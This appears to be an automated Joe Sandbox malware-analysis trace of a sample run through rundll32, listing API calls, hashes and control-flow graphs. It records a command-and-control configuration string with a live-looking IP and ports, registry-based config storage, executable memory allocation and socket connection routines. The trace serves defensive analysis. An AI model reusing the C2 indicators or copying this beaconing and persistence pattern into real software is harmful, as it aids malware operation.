                              • String ID:
                              • API String ID: 2526126748-0
                              • Opcode ID: 30e0322e740bf335009a78b6f0f1a31cc7ce83626368a11fc52ad79c7b7723d0
                              • Instruction ID: bca6d9cddc8e9780134d1e58274b6ecbdba415a320c85018617c1e7cf02383cc
                              • Opcode Fuzzy Hash: 30e0322e740bf335009a78b6f0f1a31cc7ce83626368a11fc52ad79c7b7723d0
                              • Instruction Fuzzy Hash: F021A631B11514DBDB20EF649C55BEE73A5FF18714F004699E94697280EB35EA04C6A2
                              APIs
                              • CoInitialize.OLE32(00000000), ref: 04DB662B
                              • CoCreateInstance.OLE32(04DD470C,00000000,00000001,04DD46FC,?,?,?,?,?,?,?,?,?,?,04DB5816), ref: 04DB6642
                              • SysFreeString.OLEAUT32(?), ref: 04DB66DC
                              • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,04DB5816), ref: 04DB670D
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CreateFreeInitializeInstanceStringUninitialize
                              • String ID: FriendlyName
                              • API String ID: 841178590-3623505368
                              • Opcode ID: b829822b1e02ac2cf5c0dfd2ac49abb546f7a0a05a4b8ef4144ab20f8f5733fb
                              • Instruction ID: 3ab925a7d31fa84788e628c5060a170eb8173d2ea6a9ed8ef208b1a6bc083715
                              • Opcode Fuzzy Hash: b829822b1e02ac2cf5c0dfd2ac49abb546f7a0a05a4b8ef4144ab20f8f5733fb
                              • Instruction Fuzzy Hash: 0E314A7574020AAFDB00DB99DC81EAEB7B9EF88704F148198F905EB250DA71ED05CBA1
                              APIs
                              • NtDeviceIoControlFile.NTDLL ref: 6CBF43F2
                              • RtlNtStatusToDosError.NTDLL ref: 6CBF4404
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ControlDeviceErrorFileStatus
                              • String ID: called `Result::unwrap()` on an `Err` value
                              • API String ID: 2674770877-2333694755
                              • Opcode ID: d4c7ac25d392baac3031df868a607ea835608c5ad889ad60d54d81613dd58956
                              • Instruction ID: 49cd28f624f271906e48315525f6831e316df338ceae9fbd0d2b8ec9519d8460
                              • Opcode Fuzzy Hash: d4c7ac25d392baac3031df868a607ea835608c5ad889ad60d54d81613dd58956
                              • Instruction Fuzzy Hash: FAD1A0706083818FDB04CF18C59065EB7E1EF89314F14896DE8E99BB55DB30E94ACF92
                              APIs
                              • RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020019,?), ref: 6CC11CD5
                                • Part of subcall function 6CC0C93D: RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,00000000,?,?,6CC11D27,6CCB58B1), ref: 6CC0C99B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: OpenQueryValue
                              • String ID:
                              • API String ID: 4153817207-0
                              • Opcode ID: 43029e02a3c72852b0c8edd61182e289017f547c3976e4a9865af6d2c83ed0e2
                              • Instruction ID: 8a24623766656e913170fb597ddb7d014c4c8185dd307044a5033dc90822fd4c
                              • Opcode Fuzzy Hash: 43029e02a3c72852b0c8edd61182e289017f547c3976e4a9865af6d2c83ed0e2
                              • Instruction Fuzzy Hash: BC52BF7560C3819FD324CF16C49179BB7E1AFCA354F148A2DE4899BB80EB70D949DB82
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: Time_memmovetime
                              • String ID:
                              • API String ID: 1463837790-0
                              • Opcode ID: a33751873963d48464177ddebefe0ce4e98efc1813e4d62cf5909671d04c76e6
                              • Instruction ID: 2cf828d07125d010131c8f2b652e9308d6a7352324a1970b4f216174dfb8da0f
                              • Opcode Fuzzy Hash: a33751873963d48464177ddebefe0ce4e98efc1813e4d62cf5909671d04c76e6
                              • Instruction Fuzzy Hash: 13518D72720202AFD715DFA9C8C0A6AB7E5BF48314714C668ED198B782DB31F855CBD0
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLastbind
                              • String ID:
                              • API String ID: 2328862993-0
                              • Opcode ID: 03b138a667a7cff859c47e3b18d36dae558f3a8157213bed39ccdf1449c72c03
                              • Instruction ID: 158949f83903053d330d73e62ebc5d5bb3d36b4a61a13d07356134408c5fd339
                              • Opcode Fuzzy Hash: 03b138a667a7cff859c47e3b18d36dae558f3a8157213bed39ccdf1449c72c03
                              • Instruction Fuzzy Hash: 01D05E71204221AFE7205F29D604BBA7EEDAF06214F14C8ADE4C4D6641EB74C884DB70

                              Control-flow Graph

                              APIs
                              • _memset.LIBCMT ref: 04205E71
                                • Part of subcall function 04205D70: lstrlenW.KERNEL32(?), ref: 04205D88
                                • Part of subcall function 04205D70: _memset.LIBCMT ref: 04205D92
                                • Part of subcall function 04205D70: lstrlenW.KERNEL32(|p1:45.204.213.99|o1:7677|t1:1|p2:45.204.213.99|o2:7688|t2:1|p3:45.204.213.99|o3:7699|t3:1|dd:1|cl:1|fz:), ref: 04205D9F
                                • Part of subcall function 04205D70: lstrlenW.KERNEL32(?), ref: 04205DA7
                              • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0420601B
                              • RegQueryValueExW.KERNEL32(?,IpDate,00000000,00000003,00000000,00000000), ref: 04206040
                              • _memset.LIBCMT ref: 04206058
                              • RegQueryValueExW.ADVAPI32(?,IpDate,00000000,00000003,|p1:45.204.213.99|o1:7677|t1:1|p2:45.204.213.99|o2:7688|t2:1|p3:45.204.213.99|o3:7699|t3:1|dd:1|cl:1|fz:,0000000A), ref: 04206078
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: _memsetlstrlen$QueryValue$Open
                              • String ID: Console$IpDate$bb:$bd:$bh:$bz:$cl:$dd:$dl:$fz:$jp:$kl:$ll:$o1:$o2:$o3:$p1:$p2:$p3:$sh:$sx:$t1:$t2:$t3:$|p1:45.204.213.99|o1:7677|t1:1|p2:45.204.213.99|o2:7688|t2:1|p3:45.204.213.99|o3:7699|t3:1|dd:1|cl:1|fz:
                              • API String ID: 3278200350-1944154923
                              • Opcode ID: c86ae5f4fb450e946f4d7ff774d3d5bad56f2b8e96592f6a770f4ade6df9ce2b
                              • Instruction ID: 2874941c2d4e30d035c51feed4e4c7cb3e8981977ffc944e39a7f7899accf2bb
                              • Opcode Fuzzy Hash: c86ae5f4fb450e946f4d7ff774d3d5bad56f2b8e96592f6a770f4ade6df9ce2b
                              • Instruction Fuzzy Hash: 9551B8B8BF07497BF620B6B55C4FF5D6BD44BF1E48F508052B600B91E6A9E035808DAE

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1485 42054d0-42054e6 1486 42054ec-42054f1 1485->1486 1487 420581e-4205823 1485->1487 1488 4205717-420576f VirtualAlloc call 420c8c0 call 42069bf 1486->1488 1489 42054f7-420551f RegOpenKeyExW 1486->1489 1506 4205771-42057b1 call 420c8c0 RegCreateKeyW 1488->1506 1507 42057ed-42057fc 1488->1507 1491 4205525-4205548 RegQueryValueExW 1489->1491 1492 42055ca-42055cf 1489->1492 1495 420554a-4205577 call 42069bf call 420c840 RegQueryValueExW 1491->1495 1496 42055bd-42055c7 RegCloseKey 1491->1496 1494 42055d2-42055d8 1492->1494 1498 42055f8-42055fa 1494->1498 1499 42055da-42055dd 1494->1499 1520 4205579-42055b8 VirtualAlloc call 420c8c0 1495->1520 1521 42055ba 1495->1521 1496->1492 1504 42055fd-42055ff 1498->1504 1502 42055f4-42055f6 1499->1502 1503 42055df-42055e7 1499->1503 1502->1504 1503->1498 1508 42055e9-42055f2 1503->1508 1509 4205605-420560c 1504->1509 1510 4205708-4205712 1504->1510 1524 42057b3-42057d4 RegDeleteValueW RegSetValueExW 1506->1524 1525 42057da-42057e5 RegCloseKey call 420747b 1506->1525 1513 42057fe-420581b call 42073db Sleep call 4202d10 1507->1513 1508->1494 1508->1502 1514 4205621-42056e4 call 420c840 * 3 call 42069bf call 420c8c0 1509->1514 1515 420560e-420561b VirtualFree 1509->1515 1510->1513 1530 420581d 1513->1530 1539 42056f6-4205705 call 42069ca 1514->1539 1540 42056e6-42056f4 call 4203140 1514->1540 1515->1514 1520->1521 1521->1496 1524->1525 1532 42057ea 1525->1532 1530->1487 1532->1507 1540->1539
                              APIs
                              • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 04205517
                              • RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 0420553E
                              • _memset.LIBCMT ref: 04205558
                              • RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 04205573
                              • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 04205596
                              • RegCloseKey.ADVAPI32(?), ref: 042055C1
                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 04205615
                              • _memset.LIBCMT ref: 04205679
                              • _memset.LIBCMT ref: 0420569D
                              • _memset.LIBCMT ref: 042056AF
                              • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 04205736
                              • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 042057A9
                              • RegDeleteValueW.KERNEL32(?,d33f351a4aeea5e608853d1a56661059), ref: 042057BC
                              • RegSetValueExW.KERNEL32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000065), ref: 042057D4
                              • RegCloseKey.KERNEL32(?), ref: 042057DE
                              • Sleep.KERNEL32(00000BB8), ref: 0420580E
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                              • String ID: !jWW$.$Console\0$_$d33f351a4aeea5e608853d1a56661059$e$f43067d8a2da24686468c8b827b2e02f$i$l${vU_
                              • API String ID: 354323817-2578179815
                              • Opcode ID: 791a7e5008f095eec84c5bcc83ba94727e1f443d2e0791da7dabae8651a8f0cc
                              • Instruction ID: 2d3f0125eb451074a2f7dfe9214c67ef709739cf45e54324763e0fe1b85263f3
                              • Opcode Fuzzy Hash: 791a7e5008f095eec84c5bcc83ba94727e1f443d2e0791da7dabae8651a8f0cc
                              • Instruction Fuzzy Hash: FF91B275B50204BBE720DF55DC44FAA7BB9EB99710F008198F9089B291DBB4BE80CF51

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1545 6cc194a2-6cc1950e 1690 6cc1950f call 6cc01861 1545->1690 1691 6cc1950f call 6cc01182 1545->1691 1692 6cc1950f call 6cc476b7 1545->1692 1693 6cc1950f call 6cc57ef1 1545->1693 1694 6cc1950f call 6cc01157 1545->1694 1695 6cc1950f call 6cc5849d 1545->1695 1696 6cc1950f call 6cc012db 1545->1696 1697 6cc1950f call 6cc0130b 1545->1697 1698 6cc1950f call 6cc0126c 1545->1698 1699 6cc1950f call 6cc0131c 1545->1699 1700 6cc1950f call 6cc0186f 1545->1700 1547 6cc19512-6cc1951a 1548 6cc19529-6cc19563 call 6cbf796c 1547->1548 1549 6cc1951c-6cc19524 1547->1549 1553 6cc19565-6cc1958f call 6cc010af 1548->1553 1554 6cc19594-6cc1959c 1548->1554 1550 6cc1a137-6cc1a143 1549->1550 1561 6cc1a0b0-6cc1a0b3 1553->1561 1556 6cc19a63-6cc19a6a 1554->1556 1557 6cc195a2-6cc19714 1554->1557 1559 6cc1a0d2 1556->1559 1563 6cc1a27a-6cc1a291 call 6cc625d0 call 6cc62860 1557->1563 1564 6cc1971a-6cc1977d call 6cbf5ea5 call 6cc46a27 1557->1564 1562 6cc1a0d6-6cc1a135 call 6cc0fdc7 call 6cbf5758 memmove 1559->1562 1561->1562 1562->1550 1574 6cc1a296-6cc1a2e2 call 6cc625d0 call 6cc62860 1563->1574 1578 6cc19795-6cc197b0 call 6cc46abd 1564->1578 1579 6cc1977f-6cc19790 call 6cc4738f call 6cc46a98 1564->1579 1586 6cc197b2-6cc197bd 1578->1586 1587 6cc197bf-6cc197d4 1578->1587 1579->1578 1591 6cc197da-6cc1982a call 6cc472e6 call 6cc46f1e call 6cc46e15 1586->1591 1590 6cc19a39-6cc19a5e call 6cc358e5 call 6cc36b94 1587->1590 1587->1591 1600 6cc19c61-6cc19cab memmove 1590->1600 1608 6cc19845-6cc19849 1591->1608 1609 6cc1982c-6cc19843 call 6cbe93bf 1591->1609 1602 6cc19cb1-6cc19cb6 1600->1602 1603 6cc19d52-6cc19dfe memmove * 2 1600->1603 1605 6cc19cf2-6cc19d3c memmove 1602->1605 1606 6cc19cb8-6cc19cef memmove 1602->1606 1607 6cc19e6d-6cc19ecd memmove call 6cc1a2dc 1603->1607 1612 6cc19e00-6cc19e6c memmove 1605->1612 1613 6cc19d42-6cc19d4d 1605->1613 1606->1605 1623 6cc19eec-6cc19f4b memmove 1607->1623 1624 6cc19ecf-6cc19ed5 1607->1624 1610 6cc19882-6cc198c3 1608->1610 1611 6cc1984b-6cc1986c call 6cc472e6 call 6cbe93bf 1608->1611 1626 6cc1986f-6cc1987f call 6cbe7a7b 1609->1626 1617 6cc198c5-6cc198cd 1610->1617 1618 6cc198d6-6cc198ee call 6cc470d5 1610->1618 1611->1626 1612->1607 1613->1607 1617->1618 1622 6cc198cf 1617->1622 1640 6cc198f0-6cc19964 call 6cc36b94 call 6cc0ff88 1618->1640 1641 6cc19969-6cc199e8 call 6cc3597c call 6cc35991 call 6cc17bb4 1618->1641 1622->1618 1627 6cc1a051-6cc1a092 memmove call 6cc1a2f0 call 6cc1a337 1623->1627 1628 6cc19f51 1623->1628 1632 6cc19ed7-6cc19ee7 1624->1632 1633 6cc19f56-6cc19f78 memmove 1624->1633 1626->1610 1660 6cc1a0b5-6cc1a0ce memmove 1627->1660 1661 6cc1a094-6cc1a0a8 call 6cc03cc1 1627->1661 1634 6cc1a263-6cc1a275 1628->1634 1639 6cc1a040-6cc1a049 1632->1639 1633->1574 1635 6cc19f7e-6cc1a000 memmove call 6cc36ca0 1633->1635 1634->1550 1651 6cc1a144-6cc1a184 memmove 1635->1651 1652 6cc1a006-6cc1a009 1635->1652 1639->1627 1662 6cc19b9e-6cc19ba5 1640->1662 1674 6cc19a6f 1641->1674 1675 6cc199ee-6cc19a23 call 6cbf7118 FreeContextBuffer 1641->1675 1658 6cc1a1a7-6cc1a1dd memmove * 2 1651->1658 1659 6cc1a186-6cc1a193 1651->1659 1657 6cc1a00d-6cc1a03b memmove call 6cc1a2e6 1652->1657 1657->1639 1658->1657 1668 6cc1a1e3 1658->1668 1665 6cc1a1e5-6cc1a256 memmove * 2 1659->1665 1666 6cc1a195-6cc1a1a2 1659->1666 1660->1559 1661->1561 1672 6cc19ba7-6cc19bd6 memmove 1662->1672 1673 6cc19bd9-6cc19c0d memmove 1662->1673 1669 6cc1a259-6cc1a260 1665->1669 1666->1657 1668->1669 1669->1634 1672->1673 1676 6cc19c49-6cc19c5c call 6cc35951 call 6cc358e5 1673->1676 1678 6cc19a71-6cc19b92 call 6cc359de call 6cc36ca0 1674->1678 1675->1678 1685 6cc19a25-6cc19a37 1675->1685 1676->1600 1688 6cc19b94-6cc19b97 1678->1688 1689 6cc19c0f-6cc19c46 memmove 1678->1689 1685->1678 1688->1662 1689->1676 1690->1547 1691->1547 1692->1547 1693->1547 1694->1547 1695->1547 1696->1547 1697->1547 1698->1547 1699->1547 1700->1547
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A02F
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A06A
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A0C3
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A12D
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A175
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A1B6
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A1C8
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A1F4
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC1A251
                              Strings
                              • future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs, xrefs: 6CC1A27D, 6CC1A299
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs
                              • API String ID: 2162964266-1242699868
                              • Opcode ID: dec1c8303d4823aa71901df86451f7dc3bcb9432fe60ddd05f78d1ca0162357f
                              • Instruction ID: 18506eeddd6cf1f8bda1c43b3425fe2052d759f362c2e4dc7c9845cbeb5de31c
                              • Opcode Fuzzy Hash: dec1c8303d4823aa71901df86451f7dc3bcb9432fe60ddd05f78d1ca0162357f
                              • Instruction Fuzzy Hash: 61926B759087818FC761CF25C480B9BBBF5BF89310F04896EE88D9B741EB709949DB92

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1911 4db9db0-4db9de5 GdipGetImagePixelFormat 1912 4db9dea-4db9e11 1911->1912 1913 4db9de7 1911->1913 1914 4db9e29-4db9e2f 1912->1914 1915 4db9e13-4db9e23 1912->1915 1913->1912 1916 4db9e4b-4db9e64 GdipGetImageHeight 1914->1916 1917 4db9e31-4db9e41 1914->1917 1915->1914 1918 4db9e69-4db9e8c GdipGetImageWidth 1916->1918 1919 4db9e66 1916->1919 1917->1916 1920 4db9e8e 1918->1920 1921 4db9e91-4db9eae call 4db9b90 1918->1921 1919->1918 1920->1921 1924 4db9faf-4db9fb4 1921->1924 1925 4db9eb4-4db9ec8 1921->1925 1926 4dba1ff-4dba215 call 4dbef64 1924->1926 1927 4dba029-4dba031 1925->1927 1928 4db9ece-4db9ee7 GdipGetImagePaletteSize 1925->1928 1932 4dba037-4dba074 GdipBitmapLockBits 1927->1932 1933 4dba165-4dba1d6 GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext GdipDrawImageI GdipDeleteGraphics GdipDisposeImage 1927->1933 1929 4db9ee9 1928->1929 1930 4db9eec-4db9ef8 1928->1930 1929->1930 1934 4db9efa-4db9f05 call 4db95b0 1930->1934 1935 4db9f12-4db9f1a 1930->1935 1936 4dba076-4dba07b 1932->1936 1937 4dba0a5-4dba0d2 1932->1937 1939 4dba1dc-4dba1de 1933->1939 1934->1935 1958 4db9f07-4db9f10 call 4dcc660 1934->1958 1945 4db9f1c-4db9f2a call 4dbf5d3 1935->1945 1946 4db9f30-4db9f35 call 4db1280 1935->1946 1947 4dba09b-4dba0a0 1936->1947 1948 4dba07d 1936->1948 1940 4dba11a-4dba139 GdipBitmapUnlockBits 1937->1940 1941 4dba0d4-4dba0e9 call 4dc0750 1937->1941 1942 4dba1fd 1939->1942 1943 4dba1e0 1939->1943 1940->1939 1952 4dba13f-4dba142 1940->1952 1964 4dba15b-4dba160 call 4db1280 1941->1964 1965 4dba0eb-4dba0f2 1941->1965 1942->1926 1949 4dba1e8-4dba1fb call 4dbf599 1943->1949 1961 4db9f3a-4db9f45 1945->1961 1967 4db9f2c-4db9f2e 1945->1967 1946->1961 1947->1926 1953 4dba086-4dba099 call 4dbf599 1948->1953 1949->1942 1971 4dba1e2 1949->1971 1952->1939 1953->1947 1977 4dba080 1953->1977 1962 4db9f47-4db9f49 1958->1962 1961->1962 1969 4db9f4b-4db9f4d 1962->1969 1970 4db9f76-4db9f90 GdipGetImagePalette 1962->1970 1964->1933 1965->1964 1972 4dba0f9-4dba118 1965->1972 1973 4dba151-4dba156 call 4db1280 1965->1973 1974 4dba147-4dba14c call 4db1280 1965->1974 1967->1962 1978 4db9f4f 1969->1978 1979 4db9f6c-4db9f71 1969->1979 1980 4db9f92 1970->1980 1981 4db9f95-4db9f9a 1970->1981 1971->1949 1972->1940 1972->1941 1973->1964 1974->1973 1977->1953 1984 4db9f57-4db9f6a call 4dbf599 1978->1984 1979->1926 1980->1981 1985 4db9f9c-4db9fa2 1981->1985 1986 4db9fa4-4db9faa call 4dbcc20 1981->1986 1984->1979 1995 4db9f51 1984->1995 1985->1986 1989 4db9fb9-4db9fbd 1985->1989 1986->1924 1990 4db9fbf 1989->1990 1991 4db9ff4-4dba023 call 4db9ce0 SetDIBColorTable call 4dba280 1989->1991 1993 4db9fc2-4db9ff2 1990->1993 1991->1927 1993->1991 1993->1993 1995->1984
                              APIs
                              • GdipGetImagePixelFormat.GDIPLUS(Function_00009960,?,?,00000000), ref: 04DB9DDB
                              • GdipGetImageHeight.GDIPLUS(Function_00009960,?,?,00000000), ref: 04DB9E5C
                              • GdipGetImageWidth.GDIPLUS(Function_00009960,?,?,00000000), ref: 04DB9E84
                              • GdipGetImagePaletteSize.GDIPLUS(Function_00009960,?,?,00000000), ref: 04DB9EDF
                              • _malloc.LIBCMT ref: 04DB9F20
                                • Part of subcall function 04DBF5D3: __FF_MSGBANNER.LIBCMT ref: 04DBF5EC
                                • Part of subcall function 04DBF5D3: __NMSG_WRITE.LIBCMT ref: 04DBF5F3
                                • Part of subcall function 04DBF5D3: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04DC44E0,00000000,00000001,00000000,?,04DC8DE6,00000018,04DD6448,0000000C,04DC8E76), ref: 04DBF618
                              • _free.LIBCMT ref: 04DB9F60
                              • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 04DB9F88
                              • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 04DBA00C
                              • GdipBitmapLockBits.GDIPLUS(Function_00009960,?,00000001,?,?,?,00000000), ref: 04DBA06C
                              • _free.LIBCMT ref: 04DBA08F
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Gdip$Image$Palette_free$AllocateBitmapBitsColorFormatHeapHeightLockPixelSizeTableWidth_malloc
                              • String ID: &
                              • API String ID: 1451381890-3042966939
                              • Opcode ID: 892e35435105279abc40681b8cca6cb86cae5151de6173415ec4c4b5a9c99191
                              • Instruction ID: 493169b9e0617794fb30324d5f8e82f78efbea171d0a27a771a8df98b2380039
                              • Opcode Fuzzy Hash: 892e35435105279abc40681b8cca6cb86cae5151de6173415ec4c4b5a9c99191
                              • Instruction Fuzzy Hash: 30D12BF1A00219DBDB24CF55CC94BAAB7B4FB48314F0085E9E74A97201D774AE85CFA9

                              Control-flow Graph

                              APIs
                              • ResetEvent.KERNEL32(?), ref: 04DB2DBB
                              • InterlockedExchange.KERNEL32(?,00000000), ref: 04DB2DC7
                              • timeGetTime.WINMM ref: 04DB2DCD
                              • socket.WS2_32(00000002,00000001,00000006), ref: 04DB2DFA
                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 04DB2E26
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04DB2E32
                              • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 04DB2E51
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04DB2E5D
                              • gethostbyname.WS2_32(00000000), ref: 04DB2E6B
                              • htons.WS2_32(?), ref: 04DB2E8D
                              • connect.WS2_32(?,?,00000010), ref: 04DB2EAB
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                              • String ID: 0u
                              • API String ID: 640718063-3203441087
                              • Opcode ID: fee500ae9d0c7d3e93b009b089b98d7e605069cb3e41c92c285e32c34a847ec5
                              • Instruction ID: e34eb855045ab743b3203417f8cea12e6bfed2a82271292e92d76c992df4cd90
                              • Opcode Fuzzy Hash: fee500ae9d0c7d3e93b009b089b98d7e605069cb3e41c92c285e32c34a847ec5
                              • Instruction Fuzzy Hash: D1614F71A40304AFE720DFA5DC45FAAB7B8FF4CB10F10455DF656A7280D7B4A9048BA5

                              Control-flow Graph

                              APIs
                              • ResetEvent.KERNEL32(?), ref: 04202D9B
                              • InterlockedExchange.KERNEL32(?,00000000), ref: 04202DA7
                              • timeGetTime.WINMM ref: 04202DAD
                              • socket.WS2_32(00000002,00000001,00000006), ref: 04202DDA
                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 04202E06
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04202E12
                              • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 04202E31
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04202E3D
                              • gethostbyname.WS2_32(00000000), ref: 04202E4B
                              • htons.WS2_32(?), ref: 04202E6D
                              • connect.WS2_32(?,?,00000010), ref: 04202E8B
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                              • String ID: 0u
